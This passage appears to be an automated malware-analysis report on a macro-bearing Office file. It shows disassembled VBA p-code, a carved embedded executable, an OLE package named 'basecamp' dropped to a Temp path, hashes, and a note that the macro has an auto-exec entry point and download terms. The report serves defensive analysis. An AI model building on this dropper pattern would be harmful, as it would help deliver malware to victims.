' 	MemSt Tag 
' Line #17:
' Line #18:
' Line #19:
' 	Ld UserForm2 
' 	MemLd TextBox2 
' 	MemLd Tag 
' 	Ld PointerNull 
' 	ArgsMemLd SpecialFolders 0x0001 
' 	Ld UserForm2 
' 	MemLd TextBox2 
' 	MemSt Tag 
' Line #20:
' 	Ld UserForm2 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Paren 
' 	ArgsCall ChDir 0x0001 
' Line #21:
…
embedded_office_0001dfcf.exe embedded-pe Office MZ+PE at offset 0x1DFCF 615473 bytes
SHA-256: 5c7a598fa1fd9c56c730e1febc715aaeda46170bfcc805b9d3b17649c4c25342
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1634717887/Ole10Native 548379 bytes
SHA-256: 8ebd81f3e8ed6aa01b76bfea33d194ed9360281e7bf2a2ea2820ce50d638e53a
ole10native_00_basecamp ole-package-payload OLE Ole10Native payload: ObjectPool/_1634717887/Ole10Native; display_name=basecamp; full_path=C:\Users\J\AppData\Local\Temp\basecamp; temp_path=; def_file= 547944 bytes
SHA-256: 7e1ccf2eccc89637a106e8dc36160c0f754e43b02151612828a6a5be7e5ff6bc

Open this report in the interactive analyzer, or submit your own file for analysis.